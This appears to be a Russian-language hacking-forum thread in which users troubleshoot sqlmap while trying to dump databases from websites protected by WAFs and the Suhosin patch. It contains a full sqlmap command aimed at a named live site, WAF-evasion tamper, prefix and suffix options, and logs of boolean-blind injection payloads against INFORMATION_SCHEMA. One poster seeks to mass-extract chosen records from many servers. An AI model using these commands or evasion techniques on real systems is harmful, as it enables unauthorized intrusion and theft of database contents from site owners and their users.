^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Делаю любой дамп колонок выходит [09:08:59] [INFO] retrieving the length of query output [09:09:01] [INFO] retrieved: [09:09:02] [INFO] resumed: ????????????????????? --no-cast --hex - не помогло
python2 sqlmap.py -u http://bunnycredits.com/index.php?a=showproduct&id=180 --random-agent --threads=10 --dbs /data/data/com.termux/files/usr/bin/sh: 2: --random-agentt: not found кто знает почему такая херня
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку. Еще выводится такая строчка... [22:49:09] [INFO] heuristics detected web page charset 'windows-1252' Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее! P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ? Code: --fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs Code: back-end DBMS: MySQL unknown [09:35:14] [INFO] fetching database names [09:35:14] [INFO] fetching number of databases [09:35:14] [PAYLOAD] 1'" [09:35:14] [WARNING] reflective value(s) found and filtering out [09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!' [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!' [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!' [09:35:14] [INFO] retrieved: [09:35:14] [DEBUG] performed 3 queries in 0.23 seconds [09:35:14] [ERROR] unable to retrieve the number of databases [09:35:14] [INFO] falling back to current database [09:35:14] [INFO] fetching current database [09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!' [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!' [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!' [09:35:15] [INFO] retrieved: [09:35:15] [DEBUG] performed 3 queries in 0.22 seconds [09:35:15] [CRITICAL] unable to retrieve the database names
Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда ((( Code: [10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive [10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected [10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (bool*int) Payload: class=27&id=(1291=1291)*2659*/!' ---
Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере. Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
добавляет окончание ко всем твоим реквестам http://site/injection.php?param=1+union+select+123-BR http://site/injection.php?param=1+union+select+@@version-BR идея понятна?
-BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
значение суфикса аномальное, о чем я уже отписался выше. "вопрос про его использование в контекста самого языка MySQL" его используют чтобы кастомезировать выборку из базы, прикрутить лимит или какое то неординарное условие. по факту --suffix просто добавляет строку в конец запроса, о чем собственно сообщил BigBear